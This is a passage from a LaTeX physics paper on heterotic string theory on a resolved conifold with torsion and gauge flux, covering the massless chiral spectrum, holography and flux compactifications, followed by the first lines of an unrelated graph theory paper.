$(a,a,a)$ type, $i.e.$ antichiral w.r.t. the $\mathcal{N}=2$ superconformal
algebras of the $SL(2,\mathbb{R})/U(1)$ and the two $SU(2)/U(1)$ super-cosets. For properties of these chiral primaries we refer the reader to appendix~\ref{appchar}. States of this type have conformal dimension one-half provided the $SL(2,\mathbb{R})$ spin obeys
\begin{equation}
J=1+\frac{j_1+j_2}{2}\,.
\end{equation}
The condition relating the R-charges of the three coset theories, as can be read from the partition function~(\ref{resolveddiscpf}), imply that:\footnote{
These three equations correspond respectively to the $SL(2,\mathbb{R})/U(1)$ factor, to the first $SU(2)/U(1)$ super-coset, with spin $j_1$ and to the second one, with spin $j_2$.}
\begin{equation}
\left\{ \begin{array}{lcl} m_1 -2\ell M &=&2(J-1)\, =\, j_1 + j_2 \\[4pt]
m_1 & =& 2j_1\\[4pt]
m_1-4\ell M & =& 2j_2
\end{array}
\right. \implies j_1 - j_2 \,=\, 2\ell M \,.
\end{equation}
Then, one can first tensor states of this kind with right chiral primaries of $SL(2,\mathbb{R})/U(1)$ (denoted $\bar{c}$). The conformal dimension
of the conformal primary obtained by adding the $ SU(2)_{k-2} \times SU(2)_{k-2}$ contribution has the requested dimension
$\bar \Delta = 1/2$, provided that
\begin{equation}
(j_1+1)^2 + (j_2+1)^2 = 2 \ell^2 \, ,
\end{equation}
and the R-charge of $SL(2,\mathbb{R})/U(1)$ is such that $j_1+j_2+2 = 2\ell N$.
There exists a single solution to all these constraints for $N=1$ and $M=0$, leading to a
$(a,a,a)_\textsc{u} \otimes \bar{c}$ state with $J=\ell$ and $j_1=j_2=\ell-1$. Starting instead with a right anti-chiral primary
of $SL(2,\mathbb{R})/U(1)$ (denoted $\bar{a}$), we arrives at the two constraints
\begin{equation}
\left\{ \begin{array}{lcl} j_1^2 + j_2^2 &=& 0\\[4pt]
j_1+j_2 &=& 2\ell N
\end{array}
\right. \, ,
\end{equation}
which can simultaneously be solved by setting $J=1$ and $j_1=j_2=0$.
One can attempt to obtain other massless states in the untwisted sector of the theory by considering left chiral primaries of the $(c,c,a)$ or $(c,a,c)$ type. In those cases, however, one finds that there are no solutions to the corresponding system of constraints, and so no corresponding physical states.
To summarize, the untwisted sector spectrum contains only the following states, that are all even under the left and right \textsc{gso} projections~:
\begin{itemize}
\item Two chiral multiplets in space-time from $(a,a,a)_\textsc{u} \otimes \bar{c}$ worldsheet chiral primaries
with spins $j_1=j_2=\ell-1$, one in the singlet and the other one in the fundamental of $SO(26)$. These states both have space-time R-charge
$R=2(\ell-1)$.
\item Two chiral multiplets from $(a,a,a)_\textsc{u} \otimes \bar{a}$ primaries
with spins $j_1=j_2=0$, one in the singlet and the other one in the fundamental of $SO(26)$. These states both have vanishing space-time R-charge.
\end{itemize}
\subsubsection*{Twisted sector}
The analysis of the twisted sector is along the same lines, except that the spin of the second $SU(2)/U(1)$ is
different, and that the right \textsc{gso} projection is reversed.
One can first consider states of the $(a,a,a)_\textsc{t}$ type. The $SL(2,\mathbb{R})$ spin takes the values
\begin{equation}
J=\ell^2+\frac{1}{2}+\frac{j_1-j_2}{2}\,.
\end{equation}
Then, the relation between the left R-charges entails that
\begin{equation}
\left\{ \begin{array}{lcl} m_1 -2\ell M &=&2(J-1)\, =\, 2\ell^2-1+j_1-j_2 \\[4pt]
m_1 & =& 2j_1\\[4pt]
m_1-4\ell M & = & 4\ell^2-2j_2-2
\end{array}
\right. \implies j_1 + j_2+1 \,=\, 2\ell( M+\ell)\,.
\end{equation}
Now, tensoring the states under consideration with a right chiral primary of $SL(2,\mathbb{R})/U(1)$ does not give any solution. Instead, tensoring with a right anti-chiral primary of the same leads to the two constraints:
\begin{equation}
\left\{ \begin{array}{lcl} j_1^2 + (j_2+1)^2 &=& 2\ell^2\\[4pt]
j_1-j_2-1+2\ell^2 &=& 2\ell N
\end{array}
\right. \, ,
\end{equation}
which are simultaneously solved by $N=\ell$ and $M=1-\ell$. This corresponds to a state with spins
$j_1= \ell$, $j_2=\ell-1$ and $J= \ell^2+1$.
A second kind of physical states is obtained by starting from a left $(c,a,c)_\textsc{t}$ chiral primary, with $SL(2,\mathbb{R})$ spin obeying
\begin{equation}
J=\ell^2-\frac{j_1+j_2}{2}\,.
\end{equation}
Repeating the previous analysis, the relation between the R-charges dictates
\begin{equation}
\left\{ \begin{array}{lcl} m_1 -2\ell M &=&2J = 2\ell^2-j_1-j_2\\[4pt]
m_1 & = & 2j_1\\[4pt]
m_1-4\ell M & = & 4\ell^2-2j_2
\end{array}
\right. \implies \left\{ \begin{array}{lcl} j_1&=&0 \\[4pt] j_2&=&2\ell(\ell+M) \end{array}
\right. \,.
\end{equation}
Then for a right chiral primary $\bar{c}$ of $SL(2,\mathbb{R})/U(1)$, this leads to the conditions:
\begin{equation}
\left\{ \begin{array}{lcl} 4\ell^2(M+\ell)^2 &=&0\\[4pt] \ell (M+N) & =& 0
\end{array}
\right. \, ,
\end{equation}
with a single solution for $M=-\ell$ and $N=\ell$. This implies $j_1=0$, $j_2 = 0$ and $J=\ell^2$. One can check that no other combinations of left and right
chiral primaries leads to any new massless physical state.
To summarize, we have found that the twisted sector spectrum only contains the following states:\footnote{These states
are even under the \textsc{gso}
projection because the latter is reversed in the twisted sector of the orbifold.}
\begin{itemize}
\item Two chiral multiplets in space-time from $(a,a,a)_\textsc{t} \otimes \bar{a}$ worldsheet chiral primaries
with spins $j_1=j_2+1=\ell$ and $J=\ell^2+1$, in the singlet and fundamental of $SO(26)$.
\item Two chiral multiplets from $(c,a,c)_\textsc{t} \otimes \bar{c}$ primaries
with spins $j_1=j_2=0$ and $J=\ell^2$, in the singlet and fundamental of $SO(26)$.
\end{itemize}
All these states have space-time R-charge $R=2\ell^2$. Note that the singlet $(c,a,c)_\textsc{t} \otimes \bar{c}$ state corresponds to the vertex operator that
appears in the Liouville interaction~(\ref{Liouvint}).
\begin{table}
\centering
\begin{tabular}{|l|l|l|l|}
\cline{2-4}
\multicolumn{1}{c|}{ } & Worldsheet chirality & $SU(2) \times SU(2)$ spin & Spacetime R-charge \\
\hline
Untwisted sector & $(a,a,a) \otimes \bar{c}$ & $j_1=j_2 = \ell-1$ & $R=2(\ell-1)$\\
& $(a,a,a) \otimes \bar{a}$ & $j_1=j_2 = 0$ & $R=0$\\
\hline
Twisted sector & $(a,a,a) \otimes \bar{a}$ & $j_1=j_2+1=\ell$ & $R=2\ell^2$\\
& $(c,a,c) \otimes \bar{c}$ & $j_1=j_2=0$ & $R=2\ell^2$\\
\hline
\end{tabular}
\caption{\it Massless spectrum of chiral multiplets in space-time. For each entry of the table one has one singlet and one fundamental
of $SO(26)$.}
\label{masslesstable}
\end{table}
We have summarized the whole massless spectrum found in our particular example in table~\ref{masslesstable}.
\section{Conclusion and Discussion}
In this work, we have constructed a new class of conifold backgrounds in heterotic string
theory, which exhibit non-trivial torsion and support an Abelian gauge bundle. The supersymmetry
equations and the Bianchi identity of heterotic supergravity also imply a non-trivial dilaton and a conformal factor for the conifold metric.
By implementing a $\mathbb{Z}_2$ orbifold on the $T^{1,1}$ base, one can consider resolving the conifold singularity (which is in the present case also a strong coupling singularity) by a four-cycle, leading to a smooth solution.
This is a natural choice of resolution in the heterotic context, as the resolution
is then naturally supported by a gauge flux proportional to the normalizable harmonic two-form implied by
Hodge duality. It is of course perfectly possible
that, in addition, a deformation of the conifold singularity is also allowed in the presence of torsion and of a line bundle. This would be an interesting follow-up of this work, having in mind heterotic conifold transitions.
Numerical solutions for the metric have been found in the large charge limit, such that at infinity one recovers the
Ricci-flat, K\"ahler conifold, while at finite values of the radial coordinate the conifold is squashed and warped, and acquires intrinsic
torsion, leading to a complex but non-K\"ahler space.
Remarkably, the region near the resolved conifold singularity, that can be cleanly isolated from the asymptotically Ricci-flat region by means of a double scaling limit, is found to admit a worldsheet \textsc{cft} description in terms of a gauged \textsc{wzw} model. This allows in principle to obtain the background fields to all orders in $\alpha'$, providing by construction an exact
solution to the Bianchi identity beyond the large charge limit. We did not explicitly calculate the expressions for the
exact background fields, which is straightforward but technically involved.
Instead, we used the algebraic worldsheet \textsc{cft} to compute the full string spectrum of the theory, focusing on a particular class of shift vectors. We found a set of states localized near the resolved singularity, that give four-dimensional massless $\mathcal{N}=1$ chiral multiplets in space-time. We also emphasized the role of non-perturbative $\alpha'$ effects,
or worldsheet instantons, that manifest themselves as sine--Liouville-like interactions, for generic bundles. We showed in particular how the conditions necessary for the existence of the corresponding operator in the physical spectrum of the quantum theory are related to the $\mathbb{Z}_2$ orbifold in the geometry, and how
the constraint on the first Chern class of the Abelian bundle can be exactly reproduced
from worldsheet instanton effects.
There are other interesting aspects of this class of heterotic solutions that we did not develop in the previous sections. We would therefore like to comment here on their holographic interpretation and their embedding in heterotic flux compactifications.
\subsection{Holography}\label{holo}
In the blow-down limit $a\to 0$ of the solutions~(\ref{sol-ansatz}), the dilaton becomes linear in the whole throat region,
hence a strong coupling singularity appears for $r\to 0$. As reviewed in the introduction, this breakdown of perturbation theory
generically expresses itself in the appearance of heterotic five-branes, coming from the zero-size limit of some gauge instanton.
In the present context, where the transverse space geometry is the warped conifold, the heterotic five-branes should be wrapping the vanishing two-cycle on the $T^{1,1}$ base, to eventually give rise to a four-dimensional theory. The $\mathcal{H}$-flux is indeed supported by the three-cycle orthogonal to it, see~(\ref{sol-ansatz}b). In addition, we have a non-trivial magnetic gauge flux (characterized by the shift vector $\vec{p}$) threading the two-cycle, which is necessary to satisfy the Bianchi identity at leading order. Hence we can understand this brane configuration as the heterotic analogue of fractional D3-branes on the conifold (which are actually D5-branes wrapped on the vanishing two-cycle). However here the number of branes, or the flux number, is not enough to characterize the theory, as one should also specify the actual gauge bundle intervening in the construction.
Adding a $\mathbb{Z}_2$ orbifold to the $T^{1,1}$ base of the conifold, one can consider resolving the singularity by blowing up a $\mathbb{C} P^1\times \mathbb{C} P^1$, which, in the heterotic theory, requires turning on a second Abelian gauge bundle (with shift vector $\vec{q}$). This does not change the asymptotics of the solution, hence the dilaton is still asymptotically linear; however the solution is now smooth everywhere. As for the flat heterotic five-brane solution of \textsc{chs}~\cite{Callan:1991dj}, this amounts, from the
supergravity perspective, to give a finite size to the gauge
instanton.\footnote{Unlike for non-Abelian instantons, in the present case there is
no independent modulus giving the size of the instanton.}
From the perspective of the compactified four-dimensional heterotic string,
one leaves the singularity in moduli space by moving along a perturbative branch of the
compactification moduli space, changing the vacuum expectation value of the geometrical moduli field associated with the
resolution of the conifold singularity.
Both in the blow-down and in the double-scaling limit, the dilaton is asymptotically linear, hence a holographic interpretation is expected~\cite{Aharony:1998ub}.
The dual theory should be a four-dimensional $\mathcal{N}=1$ 'little string theory'~\cite{Seiberg:1997zk}, living on the worldvolume of the wrapped five-branes.
Unlike usual cases of type \textsc{iia}/\textsc{iib} holography, one does not have a good understanding of the dual theory at hand, from a weakly coupled brane construction.
Therefore, one should guess its properties from the heterotic supergravity background. First, its global symmetries can be read from the isometries of the solution.
As for ordinary heterotic five-branes~\cite{Gremm:1999hm}, the gauge symmetry of the heterotic supergravity becomes a global symmetry. In the present case,
$SO(32)$ is actually broken to a subgroup. The breaking pattern is specified by the shift vector $\vec{p}$ which is in some sense
defined at an intermediate \textsc{uv} scale of the theory, as the corresponding gauge flux in supergravity is not supported by a normalizable two-form.
Second, the isometries of the conifold itself become global symmetries of the gauge theory, as
in \textsc{ks} theory~\cite{Klebanov:2000hb}. The $SU(2) \times SU(2)$ isometries of $T^{1,1}$ are kept unbroken at the string level, since
they correspond to the right-moving affine $\mathfrak{su}(2)$ algebras at level $\vec{p}^{\, 2}-2$.\footnote{However,
the spins of the allowed $SU(2) \times SU(2)$ representations are bounded from above, as $j_1,\, j_2 \leqslant \vec{p}^{\, 2}/2-1$.}
As in \textsc{ks} theory, the latter should be a flavour symmetry.
More interestingly, the $U(1)$ isometry along the fiber of $T^{1,1}$ is expected to give an R-symmetry in the dual theory. When the singularity is resolved (in the orbifold theory) by a blown-up four-cycle, this symmetry is broken by the Liouville potential~(\ref{Liouvintgen}) to a discrete $\mathbb{Z}_{\vec{q}^{\,2}/2-2}$ subgroup. From the point of view of the dual four-dimensional theory, it means that one considers at the singular point a theory with an unbroken
$U(1)_\textsc{r}$ symmetry. The supergravity background is then deformed by adding a normalizable gauge bundle, corresponding to $\vec{q}$,
without breaking supersymmetry. By usual AdS/CFT arguments, this corresponds in the dual theory to giving a vacuum expectation value to some
chiral operator, such that the $U(1)_\textsc{r}$ symmetry is broken to a discrete subgroup. Note that, unlike
for instance in the string dual of $\mathcal{N}=1$ \textsc{sym}~\cite{Maldacena:2000yy}, this breaking of $U(1)_R$ to a $\mathbb{Z}_{k/2}$
subgroup does {\it not} mean that the R-symmetry is anomalous, because the breaking occurs in the infrared ($i.e.$ for $r\to a$) rather than
in the ultraviolet ($r\to \infty$). One has instead a spontaneous breaking of this global symmetry, in a particular point of moduli space.
\subsubsection*{Holographic duality in the blow-down limit}
From the supergravity and worldsheet data summarized above we will attempt to better characterize the four-dimensional
$\mathcal{N}=1$ theory dual to the conifold solution under scrutiny. One actually has to deal with two issues: what is the theory
dual to the singular conifold --~or, in other words, which mechanism is responsible for the singularity~-- and what is the dual
of the orbifoldized conifold resolved by a four-cycle. A good understanding of the former would of course help to specify the latter.
First, one expects the physics at the singularity to be different for the $Spin(32)/\mathbb{Z}_2$ and the $E_8\times E_8$ heterotic string theory. As recalled in the introduction, while one does not know what happens for generic four-dimensional $\mathcal{N}=1$
compactifications, the situation is well understood for small instantons in compactifications to six dimensions.
The difference in behavior at the singularity can be understood by their different strong coupling
limit. For $Spin(32)/\mathbb{Z}_2$ heterotic string theory, S-dualizing to type I leads to a weakly coupled description,
corresponding to an 'ordinary' field theory. On the contrary, in
$E_8 \times E_8$ heterotic string theory, lifting the system to M-theory on $S^1/\mathbb{Z}_2\times K3$
leads to a theory of M5-branes with self-dual tensors, which therefore has a strongly coupled low-energy limit. Descending to four dimensions, by fibering the $K3$ on a $\mathbb{C}P^1$ base, this leads to different four-dimensional
physics at the singularity. It corresponds to strong coupling dynamics of asymptotically-free gauge groups in
$Spin(32)/\mathbb{Z}_2$~\cite{Kachru:1996ci} and to interacting fixed points connecting branches with different numbers of generations,
in the $E_8\times E_8$ case~\cite{Kachru:1997rs}.
In the present context, one can also S-dualize the $Spin(32)/\mathbb{Z}_2$ solution~(\ref{sol-ansatz}) to type I. There, in the
blow-down limit, the string coupling constant vanishes in the infrared end of the geometry ($r\to 0$), hence one expects that the low-energy
physics of the dual four-dimensional theory admits a free-field description. In terms of these variables, the theory is also not asymptotically free, since the coupling constant blows up in the \textsc{uv}. This theory is living on a stack of $k$ (up to order one corrections) type I D5-branes wrapping the vanishing two-cycle of the conifold. Such theories have $Sp(k)$ gauge groups, together with a flavor symmetry coming from the D9-brane gauge symmetry. However, as seen from the supergravity solution, one has to turn on worldvolume magnetic flux on the D9-branes in order to reproduce the theory of interest. The profile of the magnetic flux in the radial direction being non-normalizable, one expects this flux to correspond to some deformation in the Lagrangian of the four-dimensional dual theory, that breaks the $SO(32)$ flavor symmetry to a subgroup set by the choice of $\vec{p}$.
Let us consider now the $E_8\times E_8$ case. There, the singularity that appears in the blow-down limit needs to be lifted to
M-theory, where the relevant objects are wrapped M5-branes. As there is no weakly coupled description of the \textsc{ir} physics,
the dual theory should flow at low energies to an interacting theory, $i.e.$ to an $\mathcal{N}=1$ superconformal field
theory. In this case one would expect naively expect an $AdS_5$-type geometry, which is not the
case here. To understand this, first note that the little string theory decoupling limit is not a low-energy limit,
hence the metric should not be asymptotically $AdS$. Second, the $AdS_5$ geometry that should appear in the \textsc{ir} seems to be
'hidden' in the strong coupling region.\footnote{In type \textsc{iia} one can construct
non-critical strings with $\mathcal{N}=2$~\cite{Giveon:1999zm} or $\mathcal{N}=1$~\cite{Israel:2005zp} supersymmetry in four dimensions (whose worldsheet
\textsc{cft} description is quite analogous to the present models),
that are dual to Argyres-Douglas superconformal field theories in four dimensions. No $AdS_5$ geometry is seen in those theories, for similar reasons.}
\subsubsection*{Looking for a confining string}
The background obtained by resolution is completely smooth in the infrared, so
one may wonder whether it is confining.
One first notices that standard symptoms of confinement seem not to be present in our models. There is no mass gap, the
R-symmetry is broken spontaneously to $\mathbb{Z}_{\vec{q}^{\,2}/2-2}$ only
(rather than having an anomalous $U(1)_R$ broken further to $\mathbb{Z}_2$ by a gaugino condensate)
and the space-time superpotential for the blow-up mode --~that is associated to the gluino bilinear in \textsc{sym}
duals like~\cite{Vafa:2000wi}~-- vanishes identically, see~(\ref{superpot2}). However none of these features are conclusive,
as we are certainly dealing with theories having a complicated matter sector.
On general grounds, a confining behavior
can be found in holographic backgrounds by constructing Nambu-Goto long string probes,
attached to external quark sources in the \textsc{uv}, and showing that
they lead to a linear potential~\cite{Kinar:1998vq}. A confining behavior occurs whenever
the string frame metric component $g_{tt} (r)$ has a non-vanishing
minimum at the \textsc{ir} end of the gravitational background (forcing it to be stretched
along the bottom of the throat). A characteristic of our solution (which is probably generic in heterotic flux backgrounds)
is that the $\mathbb{R}^{3,1}$ part of the string frame metric is not warped, see eq.~(\ref{sol-ansatz}a). Therefore the Nambu-Goto action for a fundamental heterotic string will give simply a straight long string, as in flat space.
In the case of $Spin(32)/\mathbb{Z}_2$ heterotic strings, one needs to S-dualize the solution to type I, in order to study
the low-energy physics of the dual theory after blow-up. In fact, the resolution of the conifold singularity introduces a scale $1/a$, that should correspond to some mass scale in the holographically dual 4d theory.
The ratio of this scale over the string mass scale $1/\sqrt{\alpha'}$ is given by
$\sqrt{\mu/g_s}$, where $\mu$ is the double-scaling parameter that gives the effective string coupling at the bolt. Taking the doubly-scaled heterotic background in the perturbative regime, this ratio is necessarily large, meaning that one does not decouple the field theory
and string theory modes. Therefore, in order to reach the field-theory regime, one needs to be at strong
heterotic string coupling near the bolt. This limit is accurately described in the type I dual, in the \textsc{ir} part of the
geometry; however in the \textsc{uv} region $r\to \infty$ the type I solution is strongly coupled.
In type \textsc{I} the string frame metric of the solution reads:
\begin{equation}
\mathrm{d} s^2_\textsc{i} = H^{-1} (r)\, \eta_{\mu\nu}\mathrm{d} x^{\mu}\mathrm{d} x^{\nu} +\tfrac{3}{2} \mathrm{d} s^2 (\tilde{\mathcal{C}}_6)\, ,
\end{equation}
with $H(r) = \alpha' k/r^2$ and $r\geqslant a$. Taking a D1-brane as a confining string candidate, one would obtain exactly
the same answer as in the heterotic frame. One can consider instead a type I fundamental string, leading to the
behavior expected for a confining string (as $H(r)$ has a maximum for $r=a$).\footnote{In contrast, there is no obvious candidate for a confining string in the $E_8 \times E_8$ case, suggesting again that the physics of these models is different.}
A type I fundamental string is of course prone to breaking onto D9-branes, but this is the expected
behavior for a gauge theory with flavor in the confining/Higgs phase, since the
confining string can break as quark/antiquark pairs are created. More seriously, if one tries to 'connect' this string to external sources at infinity ($i.e.$ in the
\textsc{uv} of the dual theory), the heterotic description, which is appropriate for $r\to \infty$, does not describe at all the type I
fundamental string.
\subsubsection*{What is the dual theory?}
Let us now summarize our findings, concentrating on the $Spin (32)/\mathbb{Z}_2$ theory. Considering first the
blow-down limit, the mysterious holographic dual to the supergravity background~(\ref{sol-ansatz}), in the heterotic variables, is asymptotically free --~at least up to a scale where the little string theory description takes over~-- and flows to a strong coupling singularity. On the contrary, in the type I variables, the theory is IR-free but strongly coupled in the \textsc{uv}.
A good field theory example of this would be $SU(N_c)$ SQCD in the free electric phase, $i.e.$ with $N_f >3N_c$
flavors~\cite{Seiberg:1994pq}. Then, if one identifies the electric theory with the type I description and the magnetic theory
with the heterotic description one finds similar behaviors.
Pursuing this analogy, let us identify the resolution of the singularity in the supergravity solution with a (full) Higgsing of
the magnetic theory. One knows that it gives a mass term to part of the electric quark multiplets, giving an electric theory
with $N_f=N_c$ flavors remaining massless. Then, below this mass scale (that is set by the \textsc{vev} of the blow-up modulus)
the electric theory confines.
In a holographic dual of such a field theory
one would face a problem when trying to obtain a confining string solution. In fact, trying to connect
the putative string with the boundary, one would cross the threshold $1/a$ above which the electric theory has $N_f >3N_c$ flavors, hence is strongly coupled at high energies and is not described in terms of free electric quarks.
Notice that we did not claim that the field theory scenario
described above is dual to our heterotic supergravity background, rather that it is an
{\it example} of a supersymmetric field theory that reproduces the features implied by holographic duality. The actual construction of the
correct field theory dual remains as an open problem.
\subsubsection*{Chiral operators in the dual theory}
A way of better characterizing the holographic duality consists in studying chiral operators in the dual
four-dimensional theory, starting at the (singular) origin of its moduli space.
Following~\cite{Giveon:1999zm,Israel:2005zp}, the holographic duals of these operators can be found by looking at non-normalizable operators in the
linear dilaton background of interest. In our case, one considers the singular conifold, whose \textsc{cft} is summarized in the partition function~(\ref{conepf}).
This provides a definition of the dual theory at an intermediate \textsc{uv} scale, solely given in terms of the vector of magnetic charges $\vec{p}$.\footnote{The
resolved background, obtained by adding a second gauge field corresponding to the shift vector $\vec{q}$, is interpreted in the dual theory as the result of
giving a vacuum expectation value (\textsc{vev}) to some space-time chiral operator, changing the \textsc{ir} of the theory, see below.}
More specifically we look at worldsheet vertex operators of the form~:
\begin{equation}
\label{vertex-op}
\mathcal{O} = e^{-\varphi (z)} e^{ip_\mu X^\mu} e^{-QJ \rho} e^{i p_x X_\textsc{l} (z)}
V_{j_1 \, m_1} (z)V_{\tilde{\jmath}_2\, m_2} ( z)\bar{V}_{j_1} (\bar z)\bar{V}_{j_2} (\bar z)\bar{V}_\textsc{g} (\bar z)\, .
\end{equation}
where $e^{-\varphi}$ denotes the left superghost vacuum in the $(-1)$ picture, $V_{j\, m}(z)$ are left-moving primaries of the
$SU(2)/U(1)$ supercoset, $\bar{V}_j (\bar z)$ are $SU(2)_{k-2}$ right-moving primaries and $\bar{V}_\textsc{g} (\bar z)$ comes from the
heterotic gauge sector. In order to obtain operators with the desired properties, one has to choose
chiral or anti-chiral operators in the $SU(2)/U(1)$ super-cosets.
Physical non-normalizable operators in a linear dilaton theory have to obey the Seiberg bound, i.e. $J<1/2$ (see~\cite{Giveon:1999zm}). Furthermore, to obtain the correct
\textsc{gso} projection on the left-moving side, one chooses either $(c,a)$ or $(a,c)$
operators of $SU(2)/U(1)\times SU(2)/U(1)$. For simplicity we make the same choice of shift vector for the non-normalizable gauge field as in the remainder of the paper,
namely $\vec{p}=(2\ell,0^{15})$.
Let us for instance consider $(a,c)$ operators in the twisted sector. They are characterized by $m_1 = 2j_1$ and $m_2 = 4\ell^2-2j_2$, such that $j_1+j_2 = 2\ell(M+\ell)$.
The left and right worldsheet conformal weights of this state read:\footnote{From the four-dimensional perspective, these operators are defined off-shell. For a given value
of $p_\mu p^\mu$ the quantum number $J$ is chosen accordingly, in order to obtain an on-shell operator from the ten-dimensional point of view.}
\begin{subequations}
\begin{align}
\Delta_\textsc{ws} &= \frac{\alpha '}{4} p_\mu p^\mu + \frac{-2J(J-1)+j_1 +j_2}{4\ell^2} +
\frac{(j_1- \ell M)^2}{2\ell^2} -\frac12\,,\\
\bar{\Delta}_\textsc{ws} &= \frac{\alpha '}{4} p_\mu p^\mu + \frac{-2J(J-1)+j_1(j_1+1) +j_2(j_2+1)}{4\ell^2} + \bar{\Delta}_\textsc{g} -1\,.
\end{align}
\end{subequations}
Note that the state in the gauge sector, of right-moving conformal dimension $\bar{\Delta}_\textsc{g}$, belongs to the coset $SO(32)/SO(2)=SO(30)$
(as one Cartan has been gauged away). This leads to the condition
\begin{equation}
j_1 = \bar{\Delta}_\textsc{g} +\frac{M^2}{2} + 2\ell M +\ell^2-\frac12\, ,
\end{equation}
and the space-time $U(1)_R$ charge reads:
\begin{equation}
R = 2\bar{\Delta}_\textsc{g} +M^2 + 2\ell M +2\ell^2-1\,.
\end{equation}
A subset of these operators transform in the singlet of the $SU(2)\times SU(2)$ 'flavor' symmetry. They are characterized by
$j_1=j_2=0$, hence have $M=-\ell$; their space-time R charge is $R=2\ell^2$. Such an operator can always be found for any solution of the equation
\begin{equation}
\bar{\Delta}_\textsc{g} = \frac{\ell^2+1}{2} \,,
\end{equation}
provided the state of the gauge sector $(i)$ belongs to $SO(30)_1$ and $(ii)$ is \textsc{gso}-invariant. One
can express its conformal dimension in terms of the modes of the 15 Weyl fermions as
$\bar{\Delta}_\textsc{g} =\frac{1}{2} \sum_{i=2}^{16} (N_i)^2$.
In order to express the solution of these constraints in a more familiar form, we introduce the sixteen-dimensional vector $\vec{q}=(0,N_2,\ldots,N_{16})$.
Then one finds one space-time chiral operator for each $\vec{q}$ such that
$\vec{q}^{\, 2}= \ell^2+1 = \vec{p}^{\, 2}/4+1$ and $\vec{p}\cdot \vec{q}=0$ and such that it obeys the
condition~(\ref{fwcond}), $i.e.$ $\sum_{i} q_i \equiv \ell+1 \mod 2$.
In conclusion, the four-dimensional $\mathcal{N}=1$ theory which is dual to the warped singular conifold defined by the shift vector $\vec{p}=(2\ell,0^{15})$ contains a
subset of chiral operators in the singlet of $SU(2)\times SU(2)$, characterized by their weight $\vec{q}$ in $\mathfrak{so}(30)$. One can give a vacuum expectation value to any of these operators without breaking supersymmetry in space-time. Following the general AdS/CFT logic, it corresponds on
the gravity side to consider a normalizable deformation of the linear dilaton background, associated with
the shift vector $\vec{q}$.
One describes this process on the worldsheet by adding a Liouville potential~(\ref{Liouvintgen}) corresponding to the chosen chiral operator and satisfying $J=\ell^2$;
this operator breaks the space-time R-symmetry to $\mathbb{Z}_{2\ell^2}$.
For each consistent choice of $\vec{q}$, the perturbed worldsheet \textsc{cft} is given by one of the coset theories (\ref{cosetdef}) constructed in this work.
Note that in addition to the chiral operators discussed above, many others can be found that are not singlets of $SU(2)\times SU(2)$. In principle, these operators
can also be given a vacuum expectation value, in those cases however the worldsheet \textsc{cft} is as far as we know not solvable anymore.
As explained above we observe that, for the $E_8 \times E_8$ heterotic string theory, the singularity seems to be associated with an interacting
superconformal fixed point. In this case the conformal dimension of these operators in space time is given by
\begin{equation}
\Delta_\textsc{st} = \frac{3}{2} | R | \, = 3\ell^2\, ,
\end{equation}
after using the $\mathcal{N}=1$ superconformal algebra.
Clearly it would be interesting to obtain a more detailed characterization of the dual theory, using for instance anomaly
cancellation as a guideline. We leave this study for future work.
\subsection{Relation to heterotic flux compactifications}
The Klebanov--Strassler type \textsc{iib} background serves a dual purpose. On one side, it can be used to probe
holographically non-trivial $\mathcal{N}=1$ quantum field theories. On another side, one can engineer
type \textsc{iib} flux compactifications which are described locally, near a conifold singularity, by
such a throat~\cite{Giddings:2001yu}; this allows in particular to generate large hierarchies of couplings.
In this second context, the \textsc{ks} throat is glued
smoothly to the compactification manifold, at some \textsc{uv} scale in the field theory dual where the
string completion takes over. Typically the flux compactification and holographic interpretations complement each
other. One should keep in mind however, that from the supergravity perspective, as the flux numbers are globally
bounded from above in the orientifold compactification with flux, the curvature of the manifold is not small.
The resolved conifolds with flux constructed in this paper can also be considered from these two perspectives.
We have highlighted above aspects of the holographic interpretation. Here we would like to discuss their embedding
in heterotic compactifications. As outlined in the introduction, heterotic compactifications with torsion are not (in general)
conformally Calabi-Yau, and thus correspond to non-K\"ahler manifolds. This makes the global study of such compactifications, without relying on explicit examples, problematic.
In the absence of a known heterotic compactification for which the geometry~(\ref{sol-ansatz}) could be viewed
as a local model, one needs to understand how to 'glue' this throat geometry to the bulk of
a compactification. In addition the presence of a non-zero \textsc{nsns} charge at infinity makes
it even more difficult to make sense of the integrated Bianchi identity, leading to the tadpole cancellation conditions.
Let us imagine anyway that some torsional compactification manifold contains
a conifold singularity with \textsc{nsns} flux, leading to a non-zero five-brane charge. Heterotic
compactifications with five-branes are non-perturbative, as the strong coupling singularity of the five-branes sets us out of the perturbative regime. However with the particular type of resolution of the singularity used here,
corresponding to blowing-up the point-like instantons to finite-size, the effective string
coupling in the throat can be chosen as small as desired.
It corresponds, from the point of view of four-dimensional effective theory, to moving to
another branch of moduli space which has a weakly coupled heterotic description.
There is an important difference between the fluxed Eguchi-Hanson solution that we studied in a previous
article~\cite{Carlevaro:2008qf} and the torsional conifold
backgrounds constructed in this work. In the former case, there existed a subset of line bundles
such that the geometry was globally torsion-free, $i.e.$ such that
the Bianchi identity integrated over the four-dimensional warped Eguchi-Hanson space did not
require a Kalb-Ramond flux. In other words, there was no net five-brane
charge associated with the throat. Then the torsion, dilaton and warp factor of the solution
could be viewed as 'local' corrections to this globally
torsion-less solution near a gauge instanton, that arose because the Bianchi identity
was not satisfied locally, $i.e.$ at the form level, as the gauge bundle departed from the standard embedding.
In contrast, we have seen that the smooth conifold solutions considered here can
never be made globally torsion-free, as the required shift vector $\vec{p}$ is
not physically sensible in this case. Hence from the point of view of the full six-dimensional heterotic compactification there
is always a net $\mathcal{H}$-flux associated with the conifold throat. This is not a problem in itself, but implies that the compactification is globally
endowed with torsion.
In the regime where the string coupling in the 'bulk' of the flux compactification manifold is very small,
one expects that quantities involving only the degrees of freedom
localized in the throat can be accurately computed in the double-scaling limit, where the conifold flux background admits a worldsheet \textsc{cft} description.
This aspect clearly deserves further study.
\section*{Acknowledgements}
We would like to thank David Berenstein, Pablo C\'amara, Chris Hull, Josh Lapan, Vassilis Niarchos, Francesco Nitti, Carlos Nu\~nez, \'Angel Paredes, Boris Pioline, Cobi Sonnenschein
and Michele Trapletti for interesting and useful discussions. L.C. is supported by the Conseil r\'egional d'Ile de France, under convention
N$^{\circ}$F-08-1196/R and the Holcim Stiftung zur F\"orderung der wissenschaftlichen Fortbildung.
| 2024-02-18T23:40:06.734Z | 2010-05-27T02:00:21.000Z | algebraic_stack_train_0000 | 1,371 | 27,957 |
|
proofpile-arXiv_065-6762 | \section{Introduction}
There are a number of different parameters in graph theory which measure how well
a graph can be organised in a particular way, where the type of desired
arrangement is often motivated by geometrical properties, algorithmic
considerations, or specific applications. Well-known examples of such parameters
